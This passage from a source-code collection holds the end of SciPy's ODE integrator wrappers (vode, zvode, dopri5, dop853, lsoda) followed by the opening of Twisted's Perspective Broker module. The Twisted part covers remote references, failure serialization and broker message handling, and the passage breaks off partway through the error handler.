def step(self, *args):
itask = self.call_args[2]
self.call_args[2] = 2
r = self.run(*args)
self.call_args[2] = itask
return r
def run_relax(self, *args):
itask = self.call_args[2]
self.call_args[2] = 3
r = self.run(*args)
self.call_args[2] = itask
return r
if vode.runner is not None:
IntegratorBase.integrator_classes.append(vode)
class zvode(vode):
runner = getattr(_vode, 'zvode', None)
supports_run_relax = 1
supports_step = 1
scalar = complex
active_global_handle = 0
def reset(self, n, has_jac):
mf = self._determine_mf_and_set_bands(has_jac)
if mf in (10,):
lzw = 15 * n
elif mf in (11, 12):
lzw = 15 * n + 2 * n ** 2
elif mf in (-11, -12):
lzw = 15 * n + n ** 2
elif mf in (13,):
lzw = 16 * n
elif mf in (14, 15):
lzw = 17 * n + (3 * self.ml + 2 * self.mu) * n
elif mf in (-14, -15):
lzw = 16 * n + (2 * self.ml + self.mu) * n
elif mf in (20,):
lzw = 8 * n
elif mf in (21, 22):
lzw = 8 * n + 2 * n ** 2
elif mf in (-21, -22):
lzw = 8 * n + n ** 2
elif mf in (23,):
lzw = 9 * n
elif mf in (24, 25):
lzw = 10 * n + (3 * self.ml + 2 * self.mu) * n
elif mf in (-24, -25):
lzw = 9 * n + (2 * self.ml + self.mu) * n
lrw = 20 + n
if mf % 10 in (0, 3):
liw = 30
else:
liw = 30 + n
zwork = zeros((lzw,), complex)
self.zwork = zwork
rwork = zeros((lrw,), float)
rwork[4] = self.first_step
rwork[5] = self.max_step
rwork[6] = self.min_step
self.rwork = rwork
iwork = zeros((liw,), _vode_int_dtype)
if self.ml is not None:
iwork[0] = self.ml
if self.mu is not None:
iwork[1] = self.mu
iwork[4] = self.order
iwork[5] = self.nsteps
iwork[6] = 2 # mxhnil
self.iwork = iwork
self.call_args = [self.rtol, self.atol, 1, 1,
self.zwork, self.rwork, self.iwork, mf]
self.success = 1
self.initialized = False
if zvode.runner is not None:
IntegratorBase.integrator_classes.append(zvode)
class dopri5(IntegratorBase):
runner = getattr(_dop, 'dopri5', None)
name = 'dopri5'
supports_solout = True
messages = {1: 'computation successful',
2: 'computation successful (interrupted by solout)',
-1: 'input is not consistent',
-2: 'larger nsteps is needed',
-3: 'step size becomes too small',
-4: 'problem is probably stiff (interrupted)',
}
def __init__(self,
rtol=1e-6, atol=1e-12,
nsteps=500,
max_step=0.0,
first_step=0.0, # determined by solver
safety=0.9,
ifactor=10.0,
dfactor=0.2,
beta=0.0,
method=None,
verbosity=-1, # no messages if negative
):
self.rtol = rtol
self.atol = atol
self.nsteps = nsteps
self.max_step = max_step
self.first_step = first_step
self.safety = safety
self.ifactor = ifactor
self.dfactor = dfactor
self.beta = beta
self.verbosity = verbosity
self.success = 1
self.set_solout(None)
def set_solout(self, solout, complex=False):
self.solout = solout
self.solout_cmplx = complex
if solout is None:
self.iout = 0
else:
self.iout = 1
def reset(self, n, has_jac):
work = zeros((8 * n + 21,), float)
work[1] = self.safety
work[2] = self.dfactor
work[3] = self.ifactor
work[4] = self.beta
work[5] = self.max_step
work[6] = self.first_step
self.work = work
iwork = zeros((21,), _dop_int_dtype)
iwork[0] = self.nsteps
iwork[2] = self.verbosity
self.iwork = iwork
self.call_args = [self.rtol, self.atol, self._solout,
self.iout, self.work, self.iwork]
self.success = 1
def run(self, f, jac, y0, t0, t1, f_params, jac_params):
x, y, iwork, istate = self.runner(*((f, t0, y0, t1) +
tuple(self.call_args) + (f_params,)))
self.istate = istate
if istate < 0:
unexpected_istate_msg = 'Unexpected istate={:d}'.format(istate)
warnings.warn('{:s}: {:s}'.format(self.__class__.__name__,
self.messages.get(istate, unexpected_istate_msg)))
self.success = 0
return y, x
def _solout(self, nr, xold, x, y, nd, icomp, con):
if self.solout is not None:
if self.solout_cmplx:
y = y[::2] + 1j * y[1::2]
return self.solout(x, y)
else:
return 1
if dopri5.runner is not None:
IntegratorBase.integrator_classes.append(dopri5)
class dop853(dopri5):
runner = getattr(_dop, 'dop853', None)
name = 'dop853'
def __init__(self,
rtol=1e-6, atol=1e-12,
nsteps=500,
max_step=0.0,
first_step=0.0, # determined by solver
safety=0.9,
ifactor=6.0,
dfactor=0.3,
beta=0.0,
method=None,
verbosity=-1, # no messages if negative
):
super().__init__(rtol, atol, nsteps, max_step, first_step, safety,
ifactor, dfactor, beta, method, verbosity)
def reset(self, n, has_jac):
work = zeros((11 * n + 21,), float)
work[1] = self.safety
work[2] = self.dfactor
work[3] = self.ifactor
work[4] = self.beta
work[5] = self.max_step
work[6] = self.first_step
self.work = work
iwork = zeros((21,), _dop_int_dtype)
iwork[0] = self.nsteps
iwork[2] = self.verbosity
self.iwork = iwork
self.call_args = [self.rtol, self.atol, self._solout,
self.iout, self.work, self.iwork]
self.success = 1
if dop853.runner is not None:
IntegratorBase.integrator_classes.append(dop853)
class lsoda(IntegratorBase):
runner = getattr(_lsoda, 'lsoda', None)
active_global_handle = 0
messages = {
2: "Integration successful.",
-1: "Excess work done on this call (perhaps wrong Dfun type).",
-2: "Excess accuracy requested (tolerances too small).",
-3: "Illegal input detected (internal error).",
-4: "Repeated error test failures (internal error).",
-5: "Repeated convergence failures (perhaps bad Jacobian or tolerances).",
-6: "Error weight became zero during problem.",
-7: "Internal workspace insufficient to finish (internal error)."
}
def __init__(self,
with_jacobian=False,
rtol=1e-6, atol=1e-12,
lband=None, uband=None,
nsteps=500,
max_step=0.0, # corresponds to infinite
min_step=0.0,
first_step=0.0, # determined by solver
ixpr=0,
max_hnil=0,
max_order_ns=12,
max_order_s=5,
method=None
):
self.with_jacobian = with_jacobian
self.rtol = rtol
self.atol = atol
self.mu = uband
self.ml = lband
self.max_order_ns = max_order_ns
self.max_order_s = max_order_s
self.nsteps = nsteps
self.max_step = max_step
self.min_step = min_step
self.first_step = first_step
self.ixpr = ixpr
self.max_hnil = max_hnil
self.success = 1
self.initialized = False
def reset(self, n, has_jac):
# Calculate parameters for Fortran subroutine dvode.
if has_jac:
if self.mu is None and self.ml is None:
jt = 1
else:
if self.mu is None:
self.mu = 0
if self.ml is None:
self.ml = 0
jt = 4
else:
if self.mu is None and self.ml is None:
jt = 2
else:
if self.mu is None:
self.mu = 0
if self.ml is None:
self.ml = 0
jt = 5
lrn = 20 + (self.max_order_ns + 4) * n
if jt in [1, 2]:
lrs = 22 + (self.max_order_s + 4) * n + n * n
elif jt in [4, 5]:
lrs = 22 + (self.max_order_s + 5 + 2 * self.ml + self.mu) * n
else:
raise ValueError('Unexpected jt=%s' % jt)
lrw = max(lrn, lrs)
liw = 20 + n
rwork = zeros((lrw,), float)
rwork[4] = self.first_step
rwork[5] = self.max_step
rwork[6] = self.min_step
self.rwork = rwork
iwork = zeros((liw,), _lsoda_int_dtype)
if self.ml is not None:
iwork[0] = self.ml
if self.mu is not None:
iwork[1] = self.mu
iwork[4] = self.ixpr
iwork[5] = self.nsteps
iwork[6] = self.max_hnil
iwork[7] = self.max_order_ns
iwork[8] = self.max_order_s
self.iwork = iwork
self.call_args = [self.rtol, self.atol, 1, 1,
self.rwork, self.iwork, jt]
self.success = 1
self.initialized = False
def run(self, f, jac, y0, t0, t1, f_params, jac_params):
if self.initialized:
self.check_handle()
else:
self.initialized = True
self.acquire_new_handle()
args = [f, y0, t0, t1] + self.call_args[:-1] + \
[jac, self.call_args[-1], f_params, 0, jac_params]
y1, t, istate = self.runner(*args)
self.istate = istate
if istate < 0:
unexpected_istate_msg = 'Unexpected istate={:d}'.format(istate)
warnings.warn('{:s}: {:s}'.format(self.__class__.__name__,
self.messages.get(istate, unexpected_istate_msg)))
self.success = 0
else:
self.call_args[3] = 2 # upgrade istate from 1 to 2
self.istate = 2
return y1, t
def step(self, *args):
itask = self.call_args[2]
self.call_args[2] = 2
r = self.run(*args)
self.call_args[2] = itask
return r
def run_relax(self, *args):
itask = self.call_args[2]
self.call_args[2] = 3
r = self.run(*args)
self.call_args[2] = itask
return r
if lsoda.runner:
IntegratorBase.integrator_classes.append(lsoda)
|
e-q/scipy
|
scipy/integrate/_ode.py
|
Python
|
bsd-3-clause
| 48,017
|
# -*- test-case-name: twisted.test.test_pb -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Perspective Broker
\"This isn\'t a professional opinion, but it's probably got enough
internet to kill you.\" --glyph
Introduction
============
This is a broker for proxies for and copies of objects. It provides a
translucent interface layer to those proxies.
The protocol is not opaque, because it provides objects which represent the
remote proxies and require no context (server references, IDs) to operate on.
It is not transparent because it does I{not} attempt to make remote objects
behave identically, or even similiarly, to local objects. Method calls are
invoked asynchronously, and specific rules are applied when serializing
arguments.
To get started, begin with L{PBClientFactory} and L{PBServerFactory}.
@author: Glyph Lefkowitz
"""
import random
import types
from zope.interface import implements, Interface
# Twisted Imports
from twisted.python import log, failure, reflect
from twisted.python.hashlib import md5
from twisted.internet import defer, protocol
from twisted.cred.portal import Portal
from twisted.cred.credentials import IAnonymous, ICredentials
from twisted.cred.credentials import IUsernameHashedPassword, Anonymous
from twisted.persisted import styles
from twisted.python.components import registerAdapter
from twisted.spread.interfaces import IJellyable, IUnjellyable
from twisted.spread.jelly import jelly, unjelly, globalSecurity
from twisted.spread import banana
from twisted.spread.flavors import Serializable
from twisted.spread.flavors import Referenceable, NoSuchMethod
from twisted.spread.flavors import Root, IPBRoot
from twisted.spread.flavors import ViewPoint
from twisted.spread.flavors import Viewable
from twisted.spread.flavors import Copyable
from twisted.spread.flavors import Jellyable
from twisted.spread.flavors import Cacheable
from twisted.spread.flavors import RemoteCopy
from twisted.spread.flavors import RemoteCache
from twisted.spread.flavors import RemoteCacheObserver
from twisted.spread.flavors import copyTags
from twisted.spread.flavors import setUnjellyableForClass
from twisted.spread.flavors import setUnjellyableFactoryForClass
from twisted.spread.flavors import setUnjellyableForClassTree
# These three are backwards compatibility aliases for the previous three.
# Ultimately they should be deprecated. -exarkun
from twisted.spread.flavors import setCopierForClass
from twisted.spread.flavors import setFactoryForClass
from twisted.spread.flavors import setCopierForClassTree
MAX_BROKER_REFS = 1024
portno = 8787
class ProtocolError(Exception):
"""
This error is raised when an invalid protocol statement is received.
"""
class DeadReferenceError(ProtocolError):
"""
This error is raised when a method is called on a dead reference (one whose
broker has been disconnected).
"""
class Error(Exception):
"""
This error can be raised to generate known error conditions.
When a PB callable method (perspective_, remote_, view_) raises
this error, it indicates that a traceback should not be printed,
but instead, the string representation of the exception should be
sent.
"""
class RemoteError(Exception):
"""
This class is used to wrap a string-ified exception from the remote side to
be able to reraise it. (Raising string exceptions is no longer possible in
Python 2.6+)
The value of this exception will be a str() representation of the remote
value.
@ivar remoteType: The full import path of the exception class which was
raised on the remote end.
@type remoteType: C{str}
@ivar remoteTraceback: The remote traceback.
@type remoteTraceback: C{str}
@note: It's not possible to include the remoteTraceback if this exception is
thrown into a generator. It must be accessed as an attribute.
"""
def __init__(self, remoteType, value, remoteTraceback):
Exception.__init__(self, value)
self.remoteType = remoteType
self.remoteTraceback = remoteTraceback
class RemoteMethod:
"""
This is a translucent reference to a remote message.
"""
def __init__(self, obj, name):
"""
Initialize with a L{RemoteReference} and the name of this message.
"""
self.obj = obj
self.name = name
def __cmp__(self, other):
return cmp((self.obj, self.name), other)
def __hash__(self):
return hash((self.obj, self.name))
def __call__(self, *args, **kw):
"""
Asynchronously invoke a remote method.
"""
return self.obj.broker._sendMessage('',self.obj.perspective,
self.obj.luid, self.name, args, kw)
class PBConnectionLost(Exception):
pass
class IPerspective(Interface):
"""
per*spec*tive, n. : The relationship of aspects of a subject to each
other and to a whole: 'a perspective of history'; 'a need to view
the problem in the proper perspective'.
This is a Perspective Broker-specific wrapper for an avatar. That
is to say, a PB-published view on to the business logic for the
system's concept of a 'user'.
The concept of attached/detached is no longer implemented by the
framework. The realm is expected to implement such semantics if
needed.
"""
def perspectiveMessageReceived(broker, message, args, kwargs):
"""
This method is called when a network message is received.
@arg broker: The Perspective Broker.
@type message: str
@arg message: The name of the method called by the other end.
@type args: list in jelly format
@arg args: The arguments that were passed by the other end. It
is recommend that you use the `unserialize' method of the
broker to decode this.
@type kwargs: dict in jelly format
@arg kwargs: The keyword arguments that were passed by the
other end. It is recommended that you use the
`unserialize' method of the broker to decode this.
@rtype: A jelly list.
@return: It is recommended that you use the `serialize' method
of the broker on whatever object you need to return to
generate the return value.
"""
class Avatar:
"""
A default IPerspective implementor.
This class is intended to be subclassed, and a realm should return
an instance of such a subclass when IPerspective is requested of
it.
A peer requesting a perspective will receive only a
L{RemoteReference} to a pb.Avatar. When a method is called on
that L{RemoteReference}, it will translate to a method on the
remote perspective named 'perspective_methodname'. (For more
information on invoking methods on other objects, see
L{flavors.ViewPoint}.)
"""
implements(IPerspective)
def perspectiveMessageReceived(self, broker, message, args, kw):
"""
This method is called when a network message is received.
This will call::
self.perspective_%(message)s(*broker.unserialize(args),
**broker.unserialize(kw))
to handle the method; subclasses of Avatar are expected to
implement methods using this naming convention.
"""
args = broker.unserialize(args, self)
kw = broker.unserialize(kw, self)
method = getattr(self, "perspective_%s" % message)
try:
state = method(*args, **kw)
except TypeError:
log.msg("%s didn't accept %s and %s" % (method, args, kw))
raise
return broker.serialize(state, self, method, args, kw)
class AsReferenceable(Referenceable):
"""
A reference directed towards another object.
"""
def __init__(self, object, messageType="remote"):
self.remoteMessageReceived = getattr(
object, messageType + "MessageReceived")
class RemoteReference(Serializable, styles.Ephemeral):
"""
A translucent reference to a remote object.
I may be a reference to a L{flavors.ViewPoint}, a
L{flavors.Referenceable}, or an L{IPerspective} implementor (e.g.,
pb.Avatar). From the client's perspective, it is not possible to
tell which except by convention.
I am a \"translucent\" reference because although no additional
bookkeeping overhead is given to the application programmer for
manipulating a reference, return values are asynchronous.
See also L{twisted.internet.defer}.
@ivar broker: The broker I am obtained through.
@type broker: L{Broker}
"""
implements(IUnjellyable)
def __init__(self, perspective, broker, luid, doRefCount):
"""(internal) Initialize me with a broker and a locally-unique ID.
The ID is unique only to the particular Perspective Broker
instance.
"""
self.luid = luid
self.broker = broker
self.doRefCount = doRefCount
self.perspective = perspective
self.disconnectCallbacks = []
def notifyOnDisconnect(self, callback):
"""Register a callback to be called if our broker gets disconnected.
This callback will be called with one argument, this instance.
"""
assert callable(callback)
self.disconnectCallbacks.append(callback)
if len(self.disconnectCallbacks) == 1:
self.broker.notifyOnDisconnect(self._disconnected)
def dontNotifyOnDisconnect(self, callback):
"""Remove a callback that was registered with notifyOnDisconnect."""
self.disconnectCallbacks.remove(callback)
if not self.disconnectCallbacks:
self.broker.dontNotifyOnDisconnect(self._disconnected)
def _disconnected(self):
"""Called if we are disconnected and have callbacks registered."""
for callback in self.disconnectCallbacks:
callback(self)
self.disconnectCallbacks = None
def jellyFor(self, jellier):
"""If I am being sent back to where I came from, serialize as a local backreference.
"""
if jellier.invoker:
assert self.broker == jellier.invoker, "Can't send references to brokers other than their own."
return "local", self.luid
else:
return "unpersistable", "References cannot be serialized"
def unjellyFor(self, unjellier, unjellyList):
self.__init__(unjellier.invoker.unserializingPerspective, unjellier.invoker, unjellyList[1], 1)
return self
def callRemote(self, _name, *args, **kw):
"""Asynchronously invoke a remote method.
@type _name: C{str}
@param _name: the name of the remote method to invoke
@param args: arguments to serialize for the remote function
@param kw: keyword arguments to serialize for the remote function.
@rtype: L{twisted.internet.defer.Deferred}
@returns: a Deferred which will be fired when the result of
this remote call is received.
"""
# note that we use '_name' instead of 'name' so the user can call
# remote methods with 'name' as a keyword parameter, like this:
# ref.callRemote("getPeopleNamed", count=12, name="Bob")
return self.broker._sendMessage('',self.perspective, self.luid,
_name, args, kw)
def remoteMethod(self, key):
"""Get a L{RemoteMethod} for this key.
"""
return RemoteMethod(self, key)
def __cmp__(self,other):
"""Compare me [to another L{RemoteReference}].
"""
if isinstance(other, RemoteReference):
if other.broker == self.broker:
return cmp(self.luid, other.luid)
return cmp(self.broker, other)
def __hash__(self):
"""Hash me.
"""
return self.luid
def __del__(self):
"""Do distributed reference counting on finalization.
"""
if self.doRefCount:
self.broker.sendDecRef(self.luid)
setUnjellyableForClass("remote", RemoteReference)
class Local:
"""(internal) A reference to a local object.
"""
def __init__(self, object, perspective=None):
"""Initialize.
"""
self.object = object
self.perspective = perspective
self.refcount = 1
def __repr__(self):
return "<pb.Local %r ref:%s>" % (self.object, self.refcount)
def incref(self):
"""Increment and return my reference count.
"""
self.refcount = self.refcount + 1
return self.refcount
def decref(self):
"""Decrement and return my reference count.
"""
self.refcount = self.refcount - 1
return self.refcount
##
# Failure
##
class CopyableFailure(failure.Failure, Copyable):
"""
A L{flavors.RemoteCopy} and L{flavors.Copyable} version of
L{twisted.python.failure.Failure} for serialization.
"""
unsafeTracebacks = 0
def getStateToCopy(self):
"""
Collect state related to the exception which occurred, discarding
state which cannot reasonably be serialized.
"""
state = self.__dict__.copy()
state['tb'] = None
state['frames'] = []
state['stack'] = []
state['value'] = str(self.value) # Exception instance
if isinstance(self.type, str):
state['type'] = self.type
else:
state['type'] = reflect.qual(self.type) # Exception class
if self.unsafeTracebacks:
state['traceback'] = self.getTraceback()
else:
state['traceback'] = 'Traceback unavailable\n'
return state
class CopiedFailure(RemoteCopy, failure.Failure):
"""
A L{CopiedFailure} is a L{pb.RemoteCopy} of a L{failure.Failure}
transfered via PB.
@ivar type: The full import path of the exception class which was raised on
the remote end.
@type type: C{str}
@ivar value: A str() representation of the remote value.
@type value: L{CopiedFailure} or C{str}
@ivar traceback: The remote traceback.
@type traceback: C{str}
"""
def printTraceback(self, file=None, elideFrameworkCode=0, detail='default'):
if file is None:
file = log.logfile
file.write("Traceback from remote host -- ")
file.write(self.traceback)
file.write(self.type + ": " + self.value)
file.write('\n')
def throwExceptionIntoGenerator(self, g):
"""
Throw the original exception into the given generator, preserving
traceback information if available. In the case of a L{CopiedFailure}
where the exception type is a string, a L{pb.RemoteError} is thrown
instead.
@return: The next value yielded from the generator.
@raise StopIteration: If there are no more values in the generator.
@raise RemoteError: The wrapped remote exception.
"""
return g.throw(RemoteError(self.type, self.value, self.traceback))
printBriefTraceback = printTraceback
printDetailedTraceback = printTraceback
setUnjellyableForClass(CopyableFailure, CopiedFailure)
def failure2Copyable(fail, unsafeTracebacks=0):
f = types.InstanceType(CopyableFailure, fail.__dict__)
f.unsafeTracebacks = unsafeTracebacks
return f
class Broker(banana.Banana):
"""I am a broker for objects.
"""
version = 6
username = None
factory = None
def __init__(self, isClient=1, security=globalSecurity):
banana.Banana.__init__(self, isClient)
self.disconnected = 0
self.disconnects = []
self.failures = []
self.connects = []
self.localObjects = {}
self.security = security
self.pageProducers = []
self.currentRequestID = 0
self.currentLocalID = 0
self.unserializingPerspective = None
# Some terms:
# PUID: process unique ID; return value of id() function. type "int".
# LUID: locally unique ID; an ID unique to an object mapped over this
# connection. type "int"
# GUID: (not used yet) globally unique ID; an ID for an object which
# may be on a redirected or meta server. Type as yet undecided.
# Dictionary mapping LUIDs to local objects.
# set above to allow root object to be assigned before connection is made
# self.localObjects = {}
# Dictionary mapping PUIDs to LUIDs.
self.luids = {}
# Dictionary mapping LUIDs to local (remotely cached) objects. Remotely
# cached means that they're objects which originate here, and were
# copied remotely.
self.remotelyCachedObjects = {}
# Dictionary mapping PUIDs to (cached) LUIDs
self.remotelyCachedLUIDs = {}
# Dictionary mapping (remote) LUIDs to (locally cached) objects.
self.locallyCachedObjects = {}
self.waitingForAnswers = {}
# Mapping from LUIDs to weakref objects with callbacks for performing
# any local cleanup which may be necessary for the corresponding
# object once it no longer exists.
self._localCleanup = {}
def resumeProducing(self):
"""Called when the consumer attached to me runs out of buffer.
"""
# Go backwards over the list so we can remove indexes from it as we go
for pageridx in xrange(len(self.pageProducers)-1, -1, -1):
pager = self.pageProducers[pageridx]
pager.sendNextPage()
if not pager.stillPaging():
del self.pageProducers[pageridx]
if not self.pageProducers:
self.transport.unregisterProducer()
# Streaming producer methods; not necessary to implement.
def pauseProducing(self):
pass
def stopProducing(self):
pass
def registerPageProducer(self, pager):
self.pageProducers.append(pager)
if len(self.pageProducers) == 1:
self.transport.registerProducer(self, 0)
def expressionReceived(self, sexp):
"""Evaluate an expression as it's received.
"""
if isinstance(sexp, types.ListType):
command = sexp[0]
methodName = "proto_%s" % command
method = getattr(self, methodName, None)
if method:
method(*sexp[1:])
else:
self.sendCall("didNotUnderstand", command)
else:
raise ProtocolError("Non-list expression received.")
def proto_version(self, vnum):
"""Protocol message: (version version-number)
Check to make sure that both ends of the protocol are speaking
the same version dialect.
"""
if vnum != self.version:
raise ProtocolError("Version Incompatibility: %s %s" % (self.version, vnum))
def sendCall(self, *exp):
"""Utility method to send an expression to the other side of the connection.
"""
self.sendEncoded(exp)
def proto_didNotUnderstand(self, command):
"""Respond to stock 'C{didNotUnderstand}' message.
Log the command that was not understood and continue. (Note:
this will probably be changed to close the connection or raise
an exception in the future.)
"""
log.msg("Didn't understand command: %r" % command)
def connectionReady(self):
"""Initialize. Called after Banana negotiation is done.
"""
self.sendCall("version", self.version)
for notifier in self.connects:
try:
notifier()
except:
log.deferr()
self.connects = None
if self.factory: # in tests we won't have factory
self.factory.clientConnectionMade(self)
def connectionFailed(self):
# XXX should never get called anymore? check!
for notifier in self.failures:
try:
notifier()
except:
log.deferr()
self.failures = None
waitingForAnswers = None
def connectionLost(self, reason):
"""The connection was lost.
"""
self.disconnected = 1
# nuke potential circular references.
self.luids = None
if self.waitingForAnswers:
for d in self.waitingForAnswers.values():
try:
d.errback(failure.Failure(PBConnectionLost(reason)))
except:
log.deferr()
# Assure all Cacheable.stoppedObserving are called
for lobj in self.remotelyCachedObjects.values():
cacheable = lobj.object
perspective = lobj.perspective
try:
cacheable.stoppedObserving(perspective, RemoteCacheObserver(self, cacheable, perspective))
except:
log.deferr()
# Loop on a copy to prevent notifiers to mixup
# the list by calling dontNotifyOnDisconnect
for notifier in self.disconnects[:]:
try:
notifier()
except:
log.deferr()
self.disconnects = None
self.waitingForAnswers = None
self.localSecurity = None
self.remoteSecurity = None
self.remotelyCachedObjects = None
self.remotelyCachedLUIDs = None
self.locallyCachedObjects = None
self.localObjects = None
def notifyOnDisconnect(self, notifier):
"""Call the given callback when the Broker disconnects."""
assert callable(notifier)
self.disconnects.append(notifier)
def notifyOnFail(self, notifier):
"""Call the given callback if the Broker fails to connect."""
assert callable(notifier)
self.failures.append(notifier)
def notifyOnConnect(self, notifier):
"""Call the given callback when the Broker connects."""
assert callable(notifier)
if self.connects is None:
try:
notifier()
except:
log.err()
else:
self.connects.append(notifier)
def dontNotifyOnDisconnect(self, notifier):
"""Remove a callback from list of disconnect callbacks."""
try:
self.disconnects.remove(notifier)
except ValueError:
pass
def localObjectForID(self, luid):
"""
Get a local object for a locally unique ID.
@return: An object previously stored with L{registerReference} or
C{None} if there is no object which corresponds to the given
identifier.
"""
lob = self.localObjects.get(luid)
if lob is None:
return
return lob.object
maxBrokerRefsViolations = 0
def registerReference(self, object):
"""Get an ID for a local object.
Store a persistent reference to a local object and map its id()
to a generated, session-unique ID and return that ID.
"""
assert object is not None
puid = object.processUniqueID()
luid = self.luids.get(puid)
if luid is None:
if len(self.localObjects) > MAX_BROKER_REFS:
self.maxBrokerRefsViolations = self.maxBrokerRefsViolations + 1
if self.maxBrokerRefsViolations > 3:
self.transport.loseConnection()
raise Error("Maximum PB reference count exceeded. "
"Goodbye.")
raise Error("Maximum PB reference count exceeded.")
luid = self.newLocalID()
self.localObjects[luid] = Local(object)
self.luids[puid] = luid
else:
self.localObjects[luid].incref()
return luid
def setNameForLocal(self, name, object):
"""Store a special (string) ID for this object.
This is how you specify a 'base' set of objects that the remote
protocol can connect to.
"""
assert object is not None
self.localObjects[name] = Local(object)
def remoteForName(self, name):
"""Returns an object from the remote name mapping.
Note that this does not check the validity of the name, only
creates a translucent reference for it.
"""
return RemoteReference(None, self, name, 0)
def cachedRemotelyAs(self, instance, incref=0):
"""Returns an ID that says what this instance is cached as remotely, or C{None} if it's not.
"""
puid = instance.processUniqueID()
luid = self.remotelyCachedLUIDs.get(puid)
if (luid is not None) and (incref):
self.remotelyCachedObjects[luid].incref()
return luid
def remotelyCachedForLUID(self, luid):
"""Returns an instance which is cached remotely, with this LUID.
"""
return self.remotelyCachedObjects[luid].object
def cacheRemotely(self, instance):
"""
XXX"""
puid = instance.processUniqueID()
luid = self.newLocalID()
if len(self.remotelyCachedObjects) > MAX_BROKER_REFS:
self.maxBrokerRefsViolations = self.maxBrokerRefsViolations + 1
if self.maxBrokerRefsViolations > 3:
self.transport.loseConnection()
raise Error("Maximum PB cache count exceeded. "
"Goodbye.")
raise Error("Maximum PB cache count exceeded.")
self.remotelyCachedLUIDs[puid] = luid
# This table may not be necessary -- for now, it's to make sure that no
# monkey business happens with id(instance)
self.remotelyCachedObjects[luid] = Local(instance, self.serializingPerspective)
return luid
def cacheLocally(self, cid, instance):
"""(internal)
Store a non-filled-out cached instance locally.
"""
self.locallyCachedObjects[cid] = instance
def cachedLocallyAs(self, cid):
instance = self.locallyCachedObjects[cid]
return instance
def serialize(self, object, perspective=None, method=None, args=None, kw=None):
"""Jelly an object according to the remote security rules for this broker.
"""
if isinstance(object, defer.Deferred):
object.addCallbacks(self.serialize, lambda x: x,
callbackKeywords={
'perspective': perspective,
'method': method,
'args': args,
'kw': kw
})
return object
# XXX This call is NOT REENTRANT and testing for reentrancy is just
# crazy, so it likely won't be. Don't ever write methods that call the
# broker's serialize() method recursively (e.g. sending a method call
# from within a getState (this causes concurrency problems anyway so
# you really, really shouldn't do it))
# self.jellier = _NetJellier(self)
self.serializingPerspective = perspective
self.jellyMethod = method
self.jellyArgs = args
self.jellyKw = kw
try:
return jelly(object, self.security, None, self)
finally:
self.serializingPerspective = None
self.jellyMethod = None
self.jellyArgs = None
self.jellyKw = None
def unserialize(self, sexp, perspective = None):
"""Unjelly an sexp according to the local security rules for this broker.
"""
self.unserializingPerspective = perspective
try:
return unjelly(sexp, self.security, None, self)
finally:
self.unserializingPerspective = None
def newLocalID(self):
"""Generate a new LUID.
"""
self.currentLocalID = self.currentLocalID + 1
return self.currentLocalID
def newRequestID(self):
"""Generate a new request ID.
"""
self.currentRequestID = self.currentRequestID + 1
return self.currentRequestID
def _sendMessage(self, prefix, perspective, objectID, message, args, kw):
pbc = None
pbe = None
answerRequired = 1
if kw.has_key('pbcallback'):
pbc = kw['pbcallback']
del kw['pbcallback']
if kw.has_key('pberrback'):
pbe = kw['pberrback']
del kw['pberrback']
if kw.has_key('pbanswer'):
assert (not pbe) and (not pbc), "You can't specify a no-answer requirement."
answerRequired = kw['pbanswer']
del kw['pbanswer']
if self.disconnected:
raise DeadReferenceError("Calling Stale Broker")
try:
netArgs = self.serialize(args, perspective=perspective, method=message)
netKw = self.serialize(kw, perspective=perspective, method=message)
except:
return defer.fail(failure.Failure())
requestID = self.newRequestID()
if answerRequired:
rval = defer.Deferred()
self.waitingForAnswers[requestID] = rval
if pbc or pbe:
log.msg('warning! using deprecated "pbcallback"')
rval.addCallbacks(pbc, pbe)
else:
rval = None
self.sendCall(prefix+"message", requestID, objectID, message, answerRequired, netArgs, netKw)
return rval
def proto_message(self, requestID, objectID, message, answerRequired, netArgs, netKw):
self._recvMessage(self.localObjectForID, requestID, objectID, message, answerRequired, netArgs, netKw)
def proto_cachemessage(self, requestID, objectID, message, answerRequired, netArgs, netKw):
self._recvMessage(self.cachedLocallyAs, requestID, objectID, message, answerRequired, netArgs, netKw)
def _recvMessage(self, findObjMethod, requestID, objectID, message, answerRequired, netArgs, netKw):
"""Received a message-send.
Look up message based on object, unserialize the arguments, and
invoke it with args, and send an 'answer' or 'error' response.
"""
try:
object = findObjMethod(objectID)
if object is None:
raise Error("Invalid Object ID")
netResult = object.remoteMessageReceived(self, message, netArgs, netKw)
except Error, e:
if answerRequired:
# If the error is Jellyable or explicitly allowed via our
# security options, send it back and let the code on the
# other end deal with unjellying. If it isn't Jellyable,
# wrap it in a CopyableFailure, which ensures it can be
# unjellied on the other end. We have to do this because
# all errors must be sent back.
if isinstance(e, Jellyable) or self.security.isClassAllowed(e.__class__):
self._sendError(e, requestID)
else:
self._sendError(CopyableFailure(e), requestID)
except:
if answerRequired:
log.msg("Peer will receive following PB traceback:", isError=True)
f = CopyableFailure()
self._sendError(f, requestID)
log.err()
else:
if answerRequired:
if isinstance(netResult, defer.Deferred):
args = (requestID,)
netResult.addCallbacks(self._sendAnswer, self._sendFailureOrError,
callbackArgs=args, errbackArgs=args)
# XXX Should this be done somewhere else?
else:
self._sendAnswer(netResult, requestID)
##
# success
##
def _sendAnswer(self, netResult, requestID):
"""(internal) Send an answer to a previously sent message.
"""
self.sendCall("answer", requestID, netResult)
def proto_answer(self, requestID, netResult):
"""(internal) Got an answer to a previously sent message.
Look up the appropriate callback and call it.
"""
d = self.waitingForAnswers[requestID]
del self.waitingForAnswers[requestID]
d.callback(self.unserialize(netResult))
##
# failure
##
def _sendFailureOrError(self, fail, requestID):
"""
Call L{_sendError} or L{_sendFailure}, depending on whether C{fail}
represents an L{Error} subclass or not.
"""
if fail.check(Error) is None:
self._sendFailure(fail, requestID)
else:
self._sendError(fail, requestID)
def _sendFailure(self, fail, requestID):
"""Log error and then send it."""
log.msg("Peer will receive following PB traceback:")
log.err(fail)
self._sendError(fail, requestID)
def _sendError(self, fail, requestID):
"""(internal) Send an error for a previously sent message.
"""
if isinstance(fail, failure.Failure):
# If the failures value is jellyable or allowed through security,
# send the value
if (isinstance(fail.value, Jellyable) or
self.security.isClassAllowed(fail.value.__class__)):
fail = fail.value
elif not isinstance(fail, CopyableFailure):
fail = failure2Copyable(fail, self.factory.unsafeTracebacks)
if isinstance(fail, CopyableFailure):
fail.unsafeTracebacks = self.factory.unsafeTracebacks
self.sendCall("error", requestID, self.serialize(fail))
def proto_error(self, requestID, fail):
"""(internal) Deal with an error.
"""
